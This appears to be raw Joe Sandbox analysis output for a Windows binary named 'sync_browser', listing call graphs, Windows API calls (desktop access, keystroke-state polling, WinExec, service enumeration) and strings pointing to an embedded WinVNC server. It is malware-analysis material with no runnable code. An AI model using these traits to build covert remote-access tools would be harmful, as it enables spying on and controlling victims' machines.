7ff7400b7a04 22317 7ff7400c2950 22280->22317 22281->22278 22315 7ff7400b7b94 80 API calls 22281->22315 22284 7ff7400b7a1a 22286 7ff740013fe1 _snprintf 22285->22286 22287 7ff74001408b GetComputerNameA 22286->22287 22288 7ff7400140d0 LoadLibraryA 22287->22288 22289 7ff7400140a6 22287->22289 22290 7ff7400140fd 22288->22290 22291 7ff7400140e6 22288->22291 22289->22288 22290->22252 22320 7ff74000a040 8 API calls 22291->22320 22294 7ff7400b8cc8 22293->22294 22295 7ff7400b8c4c 22293->22295 22296 7ff7400c3238 _callnewh DecodePointer 22294->22296 22298 7ff7400b8c84 HeapAlloc 22295->22298 22299 7ff7400b8c64 22295->22299 22303 7ff7400b8cad 22295->22303 22304 7ff7400c3238 _callnewh DecodePointer 22295->22304 22307 7ff7400b8cb2 22295->22307 22297 7ff7400b8ccd 22296->22297 22300 7ff7400bffc8 _errno 69 API calls 22297->22300 22298->22295 22302 7ff7400b8cbd 22298->22302 22299->22298 22312 7ff7400c2ed0 70 API calls 2 library calls 22299->22312 22313 7ff7400c2c70 70 API calls 5 library calls 22299->22313 22314 7ff7400babd8 GetModuleHandleW GetProcAddress ExitProcess _amsg_exit 22299->22314 22300->22302 22302->22267 22310 7ff7400b7de8 70 API calls 2 library calls 22302->22310 22305 7ff7400bffc8 _errno 69 API calls 22303->22305 22304->22295 22305->22307 22309 7ff7400bffc8 _errno 69 API calls 22307->22309 22309->22302 22310->22266 22312->22299 22313->22299 22315->22278 22316->22280 22318 7ff7400c297e 22317->22318 22319 7ff7400c29bd RaiseException 22318->22319 22319->22284 22320->22290 22321 7ff740024cdb 22530 7ff74006d890 97 API calls _RunAllParam 22321->22530 22323 7ff740024cfc 22324 7ff740024d52 22323->22324 22384 7ff740050650 22323->22384 22531 7ff74002f010 SetEvent 22324->22531 22328 7ff740027c72 22329 7ff740027c81 Sleep 22328->22329 22330 7ff740027c95 22328->22330 22329->22330 22331 7ff740027cf7 22330->22331 22332 7ff740027ca6 FlushFileBuffers 22330->22332 22334 7ff740027d08 FlushFileBuffers 22331->22334 22335 7ff740027d59 22331->22335 22332->22331 22333 7ff740027ce6 CloseHandle 22332->22333 22333->22331 22334->22335 22336 7ff740027d48 CloseHandle 22334->22336 22534 7ff74006a3b0 93 API calls 2 library calls 22335->22534 22336->22335 22339 7ff740027d62 22340 7ff740027d85 22339->22340 22535 7ff740032170 16 API calls 22339->22535 22341 7ff740027dbc 22340->22341 22342 7ff740027d9d CloseDesktop 22340->22342 22351 7ff740003730 _RunAllParam 89 API calls 22341->22351 22342->22341 22345 7ff740027da7 22342->22345 22343 7ff740032220 GetLastError PostMessageA EnterCriticalSection LeaveCriticalSection 22357 7ff740024003 22343->22357 22348 7ff740003730 _RunAllParam 89 API calls 22345->22348 22346 7ff740003730 89 API calls _RunAllParam 22346->22357 22348->22341 22349 7ff7400231b0 27 API calls 22349->22357 22350 7ff74002c590 16 API calls 22350->22357 22354 7ff740027dfc GetModuleFileNameA 22351->22354 22352 7ff74006d440 16 API calls 22352->22357 22358 7ff740027e56 LoadLibraryA 22354->22358 22359 7ff740027e15 22354->22359 22355 7ff74002419d GetTickCount 22355->22357 22356 7ff740003730 _RunAllParam 89 API calls 22360 7ff740024075 OpenInputDesktop 22356->22360 22357->22328 22357->22343 22357->22346 22357->22349 22357->22350 22357->22352 22357->22355 22357->22356 22361 7ff74006d890 97 API calls 22357->22361 22372 7ff740027c47 CloseDesktop 22357->22372 22374 7ff7400240bf CloseDesktop 22357->22374 22526 7ff74006a5b0 98 API calls 2 library calls 22357->22526 22527 7ff74006a3b0 93 API calls 2 library calls 22357->22527 22528 7ff7400695d0 EnterCriticalSection LeaveCriticalSection 22357->22528 22529 7ff74002c6f0 18 API calls _RunAllParam 22357->22529 22532 7ff7400142a0 119 API calls _snprintf 22357->22532 22533 7ff74002c4e0 93 API calls _RunAllParam 22357->22533 22364 7ff740027e6b GetProcAddress 22358->22364 22365 7ff740027e9d 22358->22365 22536 7ff7400ba140 70 API calls 3 library calls 22359->22536 22360->22357 22363 7ff740027c54 22360->22363 22361->22357 22367 7ff740003730 _RunAllParam 89 API calls 22363->22367 22368 7ff740027e8f FreeLibrary 22364->22368 22377 7ff740027edd 22365->22377 22537 7ff74001e580 97 API calls _RunAllParam 22365->22537 22366 7ff740027e26 22366->22358 22367->22328 22368->22365 22372->22328 22372->22363 22374->22357 22378 7ff740027fb2 22377->22378 22380 7ff740003730 _RunAllParam 89 API calls 22377->22380 22379 7ff7400b7220 _getdrive 8 API calls 22378->22379 22381 7ff740027ff0 22379->22381 22382 7ff740027f3e 22380->22382 22538 7ff74006ab00 95 API calls _RunAllParam 22382->22538 22385 7ff740003730 _RunAllParam 89 API calls 22384->22385 22386 7ff74005068e 22385->22386 22387 7ff7400509af VkKeyScanA 22386->22387 22389 7ff74005102e 22386->22389 22391 7ff740003730 _RunAllParam 89 API calls 22386->22391 22388 7ff7400509c2 22387->22388 22390 7ff740003730 _RunAllParam 89 API calls 22388->22390 22392 7ff74005109a 22389->22392 22395 7ff740003730 _RunAllParam 89 API calls 22389->22395 22393 7ff740050a08 22390->22393 22394 7ff740050743 22391->22394 22401 7ff7400510ee 22392->22401 22573 7ff740052ef0 81 API calls 22392->22573 22396 7ff740050a13 22393->22396 22397 7ff740050d54 GetKeyState 22393->22397 22400 7ff740003730 _RunAllParam 89 API calls 22394->22400 22395->22392 22399 7ff740050d0a 22396->22399 22405 7ff740003730 _RunAllParam 89 API calls 22396->22405 22398 7ff740050d71 22397->22398 22403 7ff740050eaa 22398->22403 22404 7ff740050dbf 22398->22404 22399->22324 22400->22387 22539 7ff740051620 22401->22539 22406 7ff740003730 _RunAllParam 89 API calls 22403->22406 22408 7ff740050e0a 22404->22408 22409 7ff740050dc9 GetAsyncKeyState 22404->22409 22411 7ff740050a33 22405->22411 22412 7ff740050fe2 MapVirtualKeyA 22406->22412 22407 7ff7400510df 22574 7ff740052370 71 API calls 22407->22574 22416 7ff740050e58 22408->22416 22417 7ff740050e14 GetAsyncKeyState 22408->22417 22409->22408 22414 7ff740050dd8 MapVirtualKeyA 22409->22414 22418 7ff740003730 _RunAllParam 89 API calls 22411->22418 22568 7ff7400174c0 18 API calls 22412->22568 22562 7ff7400174c0 18 API calls 22414->22562 22415 7ff740051108 22428 7ff74005115f GetAsyncKeyState 22415->22428 22455 7ff74005111e 22415->22455 22420 7ff740050eb3 22416->22420 22421 7ff740050e62 GetAsyncKeyState 22416->22421 22417->22416 22423 7ff740050e24 MapVirtualKeyA 22417->22423 22424 7ff740050a4b 22418->22424 22420->22403 22441 7ff740050f17 GetAsyncKeyState 22420->22441 22442 7ff740050ec6 GetAsyncKeyState 22420->22442 22421->22403 22430 7ff740050e76 MapVirtualKeyA 22421->22430 22563 7ff7400174c0 18 API calls 22423->22563 22426 7ff740050d37 22424->22426 22427 7ff740050a58 22424->22427 22433 7ff740003730 _RunAllParam 89 API calls 22426->22433 22434 7ff740050b27 GetAsyncKeyState 22427->22434 22435 7ff740050ad4 GetAsyncKeyState 22427->22435 22436 7ff740051174 GetAsyncKeyState 22428->22436 22428->22455 22429 7ff740051001 22569 7ff7400502a0 109 API calls _RunAllParam 22429->22569 22564 7ff7400174c0 18 API calls 22430->22564 22431 7ff740050def 22439 7ff740003730 _RunAllParam 89 API calls 22431->22439 22432 7ff740050e3b 22443 7ff740003730 _RunAllParam 89 API calls 22432->22443 22433->22399 22450 7ff740050b3c MapVirtualKeyA 22434->22450 22451 7ff740050b77 GetAsyncKeyState 22434->22451 22444 7ff740050aec MapVirtualKeyA 22435->22444 22445 7ff740050b1e 22435->22445 22446 7ff740051184 22436->22446 22436->22455 22439->22408 22440 7ff74005124d MapVirtualKeyA 22576 7ff7400174c0 18 API calls 22440->22576 22447 7ff740050f27 MapVirtualKeyA 22441->22447 22448 7ff740050f62 GetAsyncKeyState 22441->22448 22442->22403 22456 7ff740050eda MapVirtualKeyA 22442->22456 22443->22416 22546 7ff7400174c0 18 API calls 22444->22546 22457 7ff740003730 _RunAllParam 89 API calls 22445->22457 22446->22455 22469 7ff740003730 _RunAllParam 89 API calls 22446->22469 22566 7ff7400174c0 18 API calls 22447->22566 22448->22403 22459 7ff740050f72 MapVirtualKeyA 22448->22459 22449 7ff74005100a 22570 7ff7400502a0 109 API calls _RunAllParam 22449->22570 22547 7ff7400174c0 18 API calls 22450->22547 22451->22445 22465 7ff740050b87 MapVirtualKeyA 22451->22465 22452 7ff740050e8d 22463 7ff740003730 _RunAllParam 89 API calls 22452->22463 22454 7ff740051151 22454->22440 22455->22440 22455->22454 22565 7ff7400174c0 18 API calls 22456->22565 22468 7ff740050bf1 MapVirtualKeyA 22457->22468 22567 7ff7400174c0 18 API calls 22459->22567 22463->22403 22464 7ff740051267 22464->22464 22548 7ff7400174c0 18 API calls 22465->22548 22467 7ff740050ef1 22477 7ff740003730 _RunAllParam 89 API calls 22467->22477 22549 7ff7400174c0 18 API calls 22468->22549 22479 7ff7400511a5 22469->22479 22470 7ff740050f40 22480 7ff740003730 _RunAllParam 89 API calls 22470->22480 22472 7ff740050b03 22482 7ff740003730 _RunAllParam 89 API calls 22472->22482 22473 7ff740051013 22571 7ff7400502a0 109 API calls _RunAllParam 22473->22571 22474 7ff740050b55 22484 7ff740003730 _RunAllParam 89 API calls 22474->22484 22476 7ff740050ba0 22485 7ff740003730 _RunAllParam 89 API calls 22476->22485 22477->22403 22487 7ff7400511ba 22479->22487 22488 7ff740051206 22479->22488 22489 7ff740050f5e 22480->22489 22481 7ff740050f8b 22490 7ff740003730 _RunAllParam 89 API calls 22481->22490 22482->22445 22492 7ff740050b73 22484->22492 22485->22445 22486 7ff740050c08 MapVirtualKeyA 22550 7ff7400174c0 18 API calls 22486->22550 22496 7ff740003730 _RunAllParam 89 API calls 22487->22496 22507 7ff7400511fd 22487->22507 22497 7ff740003730 _RunAllParam 89 API calls 22488->22497 22488->22507 22489->22448 22490->22403 22491 7ff74005101c 22572 7ff7400502a0 109 API calls _RunAllParam 22491->22572 22492->22451 22495 7ff740050c1f MapVirtualKeyA 22551 7ff7400174c0 18 API calls 22495->22551 22500 7ff7400511ce CreateThread CloseHandle 22496->22500 22501 7ff74005121a 22497->22501 22498 7ff740051025 22498->22389 22500->22507 22575 7ff74006a910 116 API calls _RunAllParam 22501->22575 22502 7ff740003730 _RunAllParam 89 API calls 22505 7ff740051230 WinExec 22502->22505 22503 7ff740050c36 MapVirtualKeyA 22552 7ff7400174c0 18 API calls 22503->22552 22505->22454 22507->22502 22508 7ff740050c53 MapVirtualKeyA 22553 7ff7400174c0 18 API calls 22508->22553 22510 7ff740050c6c MapVirtualKeyA 22554 7ff7400174c0 18 API calls 22510->22554 22512 7ff740050c89 MapVirtualKeyA 22555 7ff7400174c0 18 API calls 22512->22555 22514 7ff740050ca2 MapVirtualKeyA 22556 7ff7400174c0 18 API calls 22514->22556 22516 7ff740050cbf MapVirtualKeyA 22557 7ff7400174c0 18 API calls 22516->22557 22518 7ff740050cd8 MapVirtualKeyA 22558 7ff7400174c0 18 API calls 22518->22558 22520 7ff740050cef 22559 7ff7400502a0 109 API calls _RunAllParam 22520->22559 22522 7ff740050cf8 22560 7ff7400502a0 109 API calls _RunAllParam 22522->22560 22524 7ff740050d01 22561 7ff7400502a0 109 API calls _RunAllParam 22524->22561 22526->22357 22527->22357 22529->22357 22530->22323 22531->22357 22532->22357 22533->22357 22534->22339 22536->22366 22538->22378 22540 7ff74005163b 22539->22540 22541 7ff740051665 22540->22541 22577 7ff740052f30 22540->22577 22541->22415 22545 7ff74005169c 22545->22415 22546->22472 22547->22474 22548->22476 22549->22486 22550->22495 22551->22503 22552->22508 22553->22510 22554->22512 22555->22514 22556->22516 22557->22518 22558->22520 22559->22522 22560->22524 22561->22399 22562->22431 22563->22432 22564->22452 22565->22467 22566->22470 22567->22481 22568->22429 22569->22449 22570->22473 22571->22491 22572->22498 22573->22407 22574->22401 22575->22507 22576->22464 22581 7ff740052ff0 22577->22581 22579 7ff740051689 22580 7ff740052550 71 API calls 22579->22580 22580->22545 22582 7ff7400b7978 81 API calls 22581->22582 22583 7ff740053003 22582->22583 22584 7ff740053008 22583->22584 22609 7ff7400b749c 70 API calls std::exception::operator= 22583->22609 22584->22579 22586 7ff740053043 22587 7ff7400c2950 RaiseException 22586->22587 22588 7ff740053060 GetWindowLongPtrA 22587->22588 22589 7ff7400530b9 22588->22589 22595 7ff740053140 22588->22595 22591 7ff7400531ae SetWindowLongPtrA GetDlgItem 22589->22591 22592 7ff7400530c5 22589->22592 22590 7ff740053265 EndDialog 22593 7ff7400531a7 22590->22593 22594 7ff7400531de SendMessageA GetDlgItem 22591->22594 22592->22593 22592->22595 22598 7ff74005314a GetDlgItem SendMessageA 22592->22598 22599 7ff7400530e4 22592->22599 22596 7ff7400b7220 _getdrive 8 API calls 22593->22596 22597 7ff74005320f SetForegroundWindow 22594->22597 22595->22590 22600 7ff74005328a 22596->22600 22604 7ff74005322e 22597->22604 22602 7ff74005318f 22598->22602 22603 7ff740053174 SendMessageA 22598->22603 22599->22593 22601 7ff7400530ef GetDlgItem SendMessageA 22599->22601 22600->22579 22601->22595 22605 7ff740053117 SendMessageA 22601->22605 22602->22590 22603->22602 22606 7ff74005324d GetDlgItem EnableWindow 22604->22606 22607 7ff74005323a GetDlgItem EnableWindow 22604->22607 22605->22595 22608 7ff740053132 22605->22608 22606->22593 22607->22593 22608->22595 22609->22586 23321 7ff740031ae0 15 API calls _getdrive 23323 7ff7400308e0 117 API calls _RunAllParam 23325 7ff740024003 217 API calls 2 library calls 23326 7ff740010310 73 API calls free 23327 7ff740013110 73 API calls 2 library calls 23328 7ff740009910 11 API calls _getdrive 23329 7ff74000a910 99 API calls _RunAllParam 23330 7ff74002ab10 96 API calls 2 library calls 23331 7ff7400334f7 10 API calls _getdrive 23332 7ff740005910 13 API calls _getdrive 22966 7ff740009d00 22987 7ff7400029a0 22966->22987 22968 7ff740009d6b 22969 7ff740009db3 OpenSCManagerA 22968->22969 22970 7ff740009de0 EnumServicesStatusA 22969->22970 22974 7ff740009dc9 22969->22974 22971 7ff740009e2b GetLastError 22970->22971 22972 7ff740009fed CloseServiceHandle 22970->22972 22971->22972 22973 7ff740009e3c 22971->22973 22972->22974 22973->22972 22977 7ff740009e54 EnumServicesStatusA 22973->22977 22975 7ff7400b7220 _getdrive 8 API calls 22974->22975 22976 7ff74000a017 22975->22976 22978 7ff740009e93 22977->22978 22979 7ff740009fe1 _RunAllParam 22977->22979 22978->22979 22980 7ff740009eac OpenServiceA 22978->22980 22979->22972 22980->22979 22981 7ff740009ecb QueryServiceConfigA 22980->22981 22982 7ff740009fc7 CloseServiceHandle 22981->22982 22983 7ff740009ee5 GetLastError 22981->22983 22982->22978 22982->22979 22983->22982 22986 7ff740009ef4 _RunAllParam 22983->22986 22984 7ff740009f08 QueryServiceConfigA 22984->22986 22985 7ff7400029a0 81 API calls 22985->22986 22986->22982 22986->22984 22986->22985 22988 7ff740002a17 22987->22988 22990 7ff7400029bd 22987->22990 22991 7ff740002a29 22988->22991 23006 7ff7400b70b4 71 API calls std::exception::exception 22988->23006 22990->22988 22994 7ff7400029e6 22990->22994 22993 7ff740002a42 22991->22993 23007 7ff740003050 81 API calls std::exception::exception 22991->23007 22993->22968 22995 7ff740002d12 22994->22995 23008 7ff7400b7110 71 API calls std::exception::exception 22994->23008 22997 7ff740002d22 22995->22997 22998 7ff740002d41 22995->22998 23009 7ff740002fb0 71 API calls 22997->23009 22999 7ff740002d53 22998->22999 23011 7ff7400b70b4 71 API calls std::exception::exception 22998->23011 23005 7ff740002d3c 22999->23005 23012 7ff740003050 81 API calls std::exception::exception 22999->23012 23002 7ff740002d2f 23010 7ff740002fb0 71 API calls 23002->23010 23005->22968 23006->22991 23007->22993 23008->22995 23009->23002 23010->23005 23011->22999 23012->23005 23333 7ff740012d00 24 API calls 23334 7ff74000f700 280 API calls 2 library calls 23335 7ff740030700 9 API calls 23336 7ff740035100 82 API calls 2 library calls

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff7400236d0-7ff7400237b6 SetErrorMode call 7ff740003730 GetCurrentThreadId GetThreadDesktop call 7ff7400233a0 8 7ff7400237bc-7ff7400237c8 call 7ff74001f940 0->8 9 7ff740027fb4-7ff740027fd3 0->9 12 7ff7400239ea-7ff740023a33 call 7ff740003730 8->12 13 7ff7400237ce-7ff7400237e0 8->13 14 7ff740027fe1-7ff740028010 call 7ff7400b7220 9->14 26 7ff740023a39-7ff740023abe call 7ff74006d170 call 7ff740003730 timeGetTime call 7ff740065f30 12->26 27 7ff740027ef3-7ff740027f11 12->27 16 7ff7400237fe-7ff74002380d 13->16 17 7ff7400237e2-7ff7400237f3 13->17 22 7ff740023814-7ff740023858 call 7ff7400b851c call 7ff7400b92a4 * 2 call 7ff74006a320 16->22 17->16 20 7ff7400237f5-7ff7400237fc 17->20 20->22 44 7ff74002385a-7ff74002385d 22->44 45 7ff740023874-7ff7400238ad 22->45 71 7ff740023b17-7ff740023bea call 7ff740034bc0 call 7ff7400c4a10 GetComputerNameA 26->71 72 7ff740023ac0-7ff740023b11 EnterCriticalSection call 7ff74001aed0 LeaveCriticalSection 26->72 27->14 37 7ff740027f17-7ff740027f23 27->37 37->14 40 7ff740027f29-7ff740027fb2 call 7ff740003730 call 7ff74006ab00 37->40 40->14 48 7ff740023867-7ff74002386a 44->48 49 7ff74002385f-7ff740023862 call 7ff7400b8bf4 44->49 45->14 58 7ff7400238b3-7ff7400238c8 45->58 48->45 52 7ff74002386c-7ff74002386f call 7ff7400b8bf4 48->52 49->48 52->45 61 7ff7400238ca 58->61 62 7ff740023905-7ff740023926 58->62 64 7ff7400238d0-7ff7400238e4 SleepEx 61->64 65 7ff740023928 62->65 66 7ff740023932-7ff7400239bd call 7ff740003730 call 7ff74006a290 62->66 64->14 69 7ff7400238ea-7ff740023903 64->69 65->66 109 7ff7400239c2-7ff7400239c4 66->109 69->62 69->64 85 7ff740023c5c-7ff740023c7d 71->85 86 7ff740023bec-7ff740023c04 71->86 72->71 89 7ff740023c83-7ff740023c9c gethostname 85->89 90 7ff740023c41-7ff740023c55 call 7ff7400b8f48 86->90 91 7ff740023c06 86->91 92 7ff740023c9e-7ff740023cad call 7ff7400b85e0 89->92 93 7ff740023caf-7ff740023cb6 call 7ff740023220 89->93 90->89 105 7ff740023c57 90->105 94 7ff740023c10-7ff740023c3f call 7ff7400ba120 91->94 103 7ff740023cbb-7ff740023cd4 92->103 93->103 94->90 106 7ff740023d53-7ff740023d80 103->106 108 7ff740023cd6-7ff740023cdf 103->108 105->106 111 7ff740023da2-7ff740023dbf 106->111 112 7ff740023d82-7ff740023da0 106->112 108->106 110 7ff740023ce1-7ff740023ce3 108->110 109->14 114 7ff7400239ca-7ff7400239e5 call 7ff740003730 109->114 110->106 115 7ff740023ce5-7ff740023d15 110->115 113 7ff740023dc2-7ff740023ec6 call 7ff74006d710 111->113 112->113 113->9 122 7ff740023ecc-7ff740023ed8 113->122 114->14 118 7ff740023d20-7ff740023d2d 115->118 118->118 121 7ff740023d2f-7ff740023d50 118->121 121->106 122->9 123 7ff740023ede-7ff740023eef call 7ff74006d600 122->123 123->9 126 7ff740023ef5-7ff740023fff call 7ff740003730 EnterCriticalSection call 7ff7400b92a4 CreateRectRgn DeleteObject call 7ff7400b8bf4 LeaveCriticalSection call 7ff740097d90 123->126 139 7ff740024003-7ff740024016 126->139 141 7ff74002401c-7ff740024023 call 7ff74006a5b0 139->141 142 7ff7400240d1-7ff7400240dd 139->142 141->142 151 7ff740024029-7ff740024045 call 7ff740003730 141->151 144 7ff7400240f7-7ff7400240fc 142->144 145 7ff7400240df-7ff7400240e2 142->145 148 7ff7400240fe-7ff74002412f call 7ff740032220 call 7ff7400695d0 144->148 149 7ff740024134-7ff740024159 call 7ff740032220 144->149 145->144 147 7ff7400240e4-7ff7400240f2 call 7ff7400231b0 * 2 145->147 147->144 148->149 159 7ff7400241ee-7ff7400241fa 149->159 160 7ff74002415f-7ff74002418f call 7ff74002c590 149->160 151->142 167 7ff74002404b-7ff740024094 call 7ff740003730 * 2 OpenInputDesktop 151->167 163 7ff7400241fc-7ff740024203 159->163 164 7ff74002421d-7ff740024225 159->164 179 7ff740024191-7ff74002419b 160->179 180 7ff7400241e4-7ff7400241e9 160->180 163->164 169 7ff740024205-7ff740024218 call 7ff74002c590 163->169 170 7ff740024227-7ff740024253 164->170 171 7ff74002426d-7ff740024270 164->171 198 7ff74002409a-7ff7400240b0 call 7ff740003730 call 7ff74006a3b0 167->198 199 7ff740027c66 167->199 169->164 175 7ff740024268 170->175 176 7ff740024255-7ff740024263 call 7ff74006d440 170->176 177 7ff740024272-7ff74002427f call 7ff74002c6f0 171->177 178 7ff740024284-7ff740024286 171->178 175->171 176->175 177->178 186 7ff740024288-7ff7400242a4 178->186 187 7ff7400242c6-7ff7400242db 178->187 179->180 184 7ff74002419d-7ff7400241bd GetTickCount 179->184 180->159 184->180 191 7ff7400241bf-7ff7400241cf 184->191 193 7ff7400242b6-7ff7400242c1 186->193 194 7ff7400242a6-7ff7400242b1 call 7ff74006d440 186->194 188 7ff74002431e-7ff740024337 call 7ff74006d890 187->188 189 7ff7400242dd-7ff7400242e1 187->189 208 7ff740027c78-7ff740027c7f 188->208 209 7ff74002433d-7ff740024347 188->209 189->188 195 7ff7400242e3-7ff7400242f8 189->195 191->180 197 7ff7400241d1-7ff7400241df call 7ff74006d440 191->197 193->187 194->193 195->188 214 7ff7400242fa-7ff740024313 call 7ff74006d890 195->214 197->180 222 7ff740027c47-7ff740027c52 CloseDesktop 198->222 223 7ff7400240b6-7ff7400240bd 198->223 204 7ff740027c6d call 7ff740003730 199->204 211 7ff740027c72 204->211 212 7ff740027c81-7ff740027c8f Sleep 208->212 213 7ff740027c95-7ff740027ca4 208->213 215 7ff740024349-7ff740027bfd call 7ff7400142a0 209->215 216 7ff74002438b-7ff740024393 209->216 211->208 212->213 218 7ff740027cf7-7ff740027d06 213->218 219 7ff740027ca6-7ff740027ce4 FlushFileBuffers 213->219 214->208 233 7ff740024319-7ff74002431c 214->233 221 7ff740027c01-7ff740027c14 215->221 216->221 225 7ff740027d08-7ff740027d46 FlushFileBuffers 218->225 226 7ff740027d59-7ff740027d71 call 7ff74006a3b0 218->226 219->218 224 7ff740027ce6-7ff740027cec CloseHandle 219->224 237 7ff740027c23-7ff740027c25 221->237 238 7ff740027c16-7ff740027c1e call 7ff74002c4e0 221->238 222->211 235 7ff740027c54-7ff740027c64 222->235 230 7ff7400240c8-7ff7400240cc 223->230 231 7ff7400240bf-7ff7400240c2 CloseDesktop 223->231 224->218 225->226 232 7ff740027d48-7ff740027d4e CloseHandle 225->232 244 7ff740027d94-7ff740027d9b 226->244 245 7ff740027d73-7ff740027d8d call 7ff740032170 226->245 230->142 231->230 232->226 233->209 235->204 237->208 243 7ff740027c27-7ff740027c42 237->243 238->237 243->139 246 7ff740027dbc-7ff740027e13 call 7ff740003730 GetModuleFileNameA 244->246 247 7ff740027d9d-7ff740027da5 CloseDesktop 244->247 245->244 256 7ff740027e56-7ff740027e69 LoadLibraryA 246->256 257 7ff740027e15-7ff740027e53 call 7ff7400ba220 246->257 247->246 249 7ff740027da7-7ff740027db7 call 7ff740003730 247->249 249->246 259 7ff740027e6b-7ff740027e97 GetProcAddress FreeLibrary 256->259 260 7ff740027e9d-7ff740027ec0 256->260 257->256 259->260 264 7ff740027edd-7ff740027ef0 260->264 265 7ff740027ec2-7ff740027ed8 call 7ff74001e580 call 7ff740097c90 260->265 264->27 265->264
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCriticalSection$CurrentEnterFilefree$BuffersErrorFlushHandleInputLeaveLibraryNameObjectOpenSleep$AddressComputerCountCreateDeleteFreeInformationLastLoadModeModulePriorityProcRectTickTimeUser_snprintfgethostnametime
                                                                    • String ID: ( $ - $Could not connect to %s!$Could not connect using %s!$Host name unavailable$LOGEXIT$WinVNC$\logging.dll$application mode$service mode$vncclient.cpp : PostAddNewClient I$vncclient.cpp : PostAddNewClient II$vncclient.cpp : authenticated connection$vncclient.cpp : client connected : %s (%hd)$vncclient.cpp : client disconnected : %s (%hd)$vncclient.cpp : failed to close desktop$vncclient.cpp : negotiated version$vncclient.cpp : sent pixel format to client$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : PostAddNewClient failed$vncservice.cpp : SelectDesktop $vncservice.cpp : SelectDesktop failed to close desktop
                                                                    • API String ID: 459429253-3399855497
                                                                    • Opcode ID: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction ID: c7831661a1e8ee4fb68c30c16404564488e2934a2dd764cb54b026de526ed499
                                                                    • Opcode Fuzzy Hash: c708106eea21312b0ff10812b2299c3caf0780bd7169fe3a5c2cd561237a6d82
                                                                    • Instruction Fuzzy Hash: 56A29E26A0CA81C5E754FB25C848BFEB7A1FB84B94F854236DA1D477A9DF38E444C720

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryProcProcess$CloseCreateCurrentFirstFreeHandleLoadMetricsProcess32SessionSnapshotSystemToolhelp32
                                                                    • String ID: ProcessIdToSessionId$WTSGetActiveConsoleSessionId$explorer.exe$kernel32.dll
                                                                    • API String ID: 1881659197-3751679782
                                                                    • Opcode ID: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                    • Instruction ID: a1cb27de298f6e6f704efb6f218f62252460ef670fa25b78c18bd82b2d8af5f5
                                                                    • Opcode Fuzzy Hash: 2dbd4ffebc6746016a1012bd7f42155df4cc965da3ae6bbb03cb4ee60b751db4
                                                                    • Instruction Fuzzy Hash: 9A410935A1CB42C6EA64BB11A854169A3A5FF88BA0F844535D96E07BB8DF3CF505CB20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user , xrefs: 00007FF740069FB7
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0, xrefs: 00007FF740069F7F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s , xrefs: 00007FF74006A06F
                                                                    • vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on , xrefs: 00007FF74006A01F
